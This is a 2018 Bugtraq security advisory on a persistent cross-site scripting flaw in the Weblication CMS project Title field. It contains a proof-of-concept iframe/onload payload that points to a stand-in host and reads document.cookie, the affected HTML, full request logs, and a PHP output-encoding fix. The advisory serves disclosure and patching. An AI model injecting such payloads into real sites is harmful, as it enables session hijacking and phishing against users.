
List:       bugtraq
Subject:    Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2018-03-27 12:51:21
Message-ID: ece3d9bb-255b-27ed-abde-babbf944923e () vulnerability-lab ! com

Document Title:
===============
Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2121


Release Date:
=============
2018-02-21


Vulnerability Laboratory ID (VL-ID):
====================================
2121


Common Vulnerability Scoring System:
====================================
3.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
https://help.weblication.de/help12/


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a persistent cross site scripting vulnerability in the official Weblication CMS Core & Grid v12.006.024 CMS.



Vulnerability Disclosure Timeline:
==================================
2018-02-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the official Weblication CMS Core & Grid v12.006.024 CMS. The vulnerability allows remote attackers to inject their own malicious script code into the application side of the service to compromise sensitive user data or affected web-application contents.

The security vulnerability is located in the `wFilemanager.php` and `index.php` files of the `/grid5/scripts/` modules. The injection point is the project `Title` input and the execution point is the `Inhaltsprojekte` output listing section. Remote attackers with privileged user accounts are able to inject their own malicious script code with a persistent attack vector to compromise user session credentials or to manipulate the affected web-application module output context. The request method used to inject is POST and the attack vector is reflected.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable File(s):
[+] index.php
[+] wFilemanager.php

Vulnerable Input Field(s):
[+] Title

Affected Module(s):
[+] Inhaltsprojekte


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with a low-privilege web-application user account and low user interaction. For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.


PoC Inject: Title
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-



PoC Execute: Inhaltsprojekte
https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?path=/default-wGlobal/wGlobal/content/variables/default.wVariables.php&target=be&selectedTab=&display=&action=startedit&referrer=%2Fde%2Findex.php&redirectEndEdit=&showFileOptions=&anchor=



PoC: Payload
"><iframe src="evil.source" onload=alert(document.domain)>%20"><iframe src="evil.source" onload=alert(document.cookie)></iframe></iframe>


PoC: Vulnerable Source
<div style="width:936px;padding-bottom:32px">
<div class="headline">Projektbasis</div>
<div class="variableEntry" data-key="base_source" data-project="">
<div class="cellCaption">Projekt basiert auf&nbsp;</div>
<div class="cellValue" style=""><div class="wWebtagTextEditorInput"><input id="webtag_text_639020500" name="webtag_text_639020500" data-weditortype="input" class="wEditorText" style="" value="default/0.9.latest" tabindex=""></div></div>
<div class="cellKey">base_source</div></div>
<div class="variableEntry" data-key="base_sources_additional" data-project="">
<div class="cellCaption">Zusätzliche Weblics Quellen&nbsp;</div>
<div class="cellValue" style=""><div class="wWebtagTextEditorInput"><input id="webtag_text_961851163" name="webtag_text_961851163" data-weditortype="input" class="wEditorText" style="" value="" tabindex=""></div></div>
<div class="cellKey">base_sources_additional</div></div>
<div class="info">z.B. password@http://IHREDOMAIN/vorlageprojekt</div>
<div class="headline">Inhaltsprojekte</div>
<div class="cellCaption"> &nbsp;</div>
<div class="cellValue"><div style="padding-bottom:8px">
<div class="wui-button wui-button-options" style="cursor:pointer" onclick="showMaskEditProjectOptions('/de')"><div style="line-height:15px"><span>/de <span style="color:#888888">Inhalte</span></span></div></div>
<div class="wui-button wui-button-options" style="cursor:pointer" onclick="showMaskEditProjectOptions('/img-src-x-img-img-src-x-img-')"> <div style="line-height:15px"><span>/img-src-x-img-img-src-x-img-  <span style="color:#888888">"&gt;<iframe src="evil.source" onload="alert(document.domain)">%20"><iframe src="evil.source" onload=alert(document.cookie)></span> </div></div></div></div>
<div class="cellKey"> </div>
<div class="info">Neben den globalen Projekteinstellungen können Sie weitere Einstellungen in den jeweiligen Inhalts- bzw. Sprachprojekten vornehmen.</div>
<div class="headline">Logo</div>
<div class="variableEntry" data-key="logo_src" data-project=""><div class="cellCaption">Logo </div>


PoC: Session Logs
Status: 200[OK]
POST https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-
  Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Content-Type[application/x-www-form-urlencoded]
      Content-Length[596]
      Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   POST-Daten:
      action[editOptionsProject]
      path[%2Fimg-src-x-img-img-src-x-img-]
      title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
      pathProjectGlobal[%2Fdefault-wGlobal]
      pathProjectLayout[]
      language[br]
      projectConnect[%2Fimg-src-x-img-img-src-x-img-]
      hostOnly[]
      pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
      permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
      W_PRETMP_groups%5B%5D[%5BW_ID%5D]
      backupGroup[]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Vary[Accept-Encoding]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-
  Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit&path=/default-wGlobal/wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Keep-Alive[timeout=5, max=97]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents&path=/img-src-x-img-img-src-x-img-&type=project&target=embed
  Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      Keep-Alive[timeout=5, max=96]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]


Reference(s):
https://grid.localhost:8080/
https://grid.localhost:8080/weblication/
https://grid.localhost:8080/weblication/grid5/
https://grid.localhost:8080/weblication/grid5/scripts/
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by sanitizing the delivered input in the wFilemanager.php file and by escaping the output at the execution point in the Inhaltsprojekte listing.
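As an added illustration of the fix described above (example code, not Weblication's own), the Inhaltsprojekte entry from the vulnerable source is rendered once as the page emits it and once with context-aware output encoding; the function names, sample projects and the input-side check are assumptions:

```php
<?php
// Added example, not Weblication's own code. The "Inhaltsprojekte" entry from the
// advisory's vulnerable source is rebuilt twice: as the page emits it (values
// concatenated raw) and with output encoding per context. Names are assumptions.

// Constructed sample: one stored project title that carries markup.
$projects = [
    ['path' => '/de',   'title' => 'Inhalte'],
    ['path' => '/demo', 'title' => '"><i>injected</i>'],
];

// Vulnerable rendering: $title lands unencoded in the <span>, and $path is
// spliced into a JavaScript string inside onclick. A " in $title closes the
// attribute and the tag, which is exactly the execution point in the advisory.
function renderEntryVulnerable(string $path, string $title): string {
    return '<div class="wui-button wui-button-options" style="cursor:pointer"'
         . ' onclick="showMaskEditProjectOptions(\'' . $path . '\')">'
         . '<div style="line-height:15px"><span>' . $path
         . ' <span style="color:#888888">' . $title . '</span></span></div></div>';
}

// Hardened rendering: each value is encoded for the context it is written into.
// HTML text/attribute context: htmlspecialchars with ENT_QUOTES neutralises <, >,
// & and both quote characters. JavaScript string inside an attribute: json_encode
// builds a quoted, escaped JS literal, which is then HTML-encoded as well.
function renderEntryHardened(string $path, string $title): string {
    $jsFlags   = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    $pathJs    = htmlspecialchars(json_encode($path, $jsFlags), ENT_QUOTES, 'UTF-8');
    $pathHtml  = htmlspecialchars($path, ENT_QUOTES, 'UTF-8');
    $titleHtml = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
    return '<div class="wui-button wui-button-options" style="cursor:pointer"'
         . ' onclick="showMaskEditProjectOptions(' . $pathJs . ')">'
         . '<div style="line-height:15px"><span>' . $pathHtml
         . ' <span style="color:#888888">' . $titleHtml . '</span></span></div></div>';
}

// Input-side check for the editOptionsProject action: reject titles that carry
// markup characters before they are stored. Output encoding stays the primary
// control; this only reduces what can reach the listing in the first place.
function isAcceptableTitle(string $title): bool {
    return mb_strlen($title, 'UTF-8') <= 200 && preg_match('/[<>"\'`]/', $title) === 0;
}

foreach ($projects as $p) {
    printf("accepted=%d\n%s\n%s\n\n", isAcceptableTitle($p['title']),
        renderEntryVulnerable($p['path'], $p['title']),
        renderEntryHardened($p['path'], $p['title']));
}
```

The second project prints the raw `"><i>injected</i>` only in the vulnerable variant; the hardened variant emits `&quot;&gt;&lt;i&gt;injected&lt;/i&gt;`, which the browser shows as literal text.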


Security Risk:
==============
The security risk of the persistent cross site scripting vulnerability in the web-application is estimated as medium (cvss 3.5).



Credits & Authors:
==================
Benjamin K.M. [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious, militant and racist hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

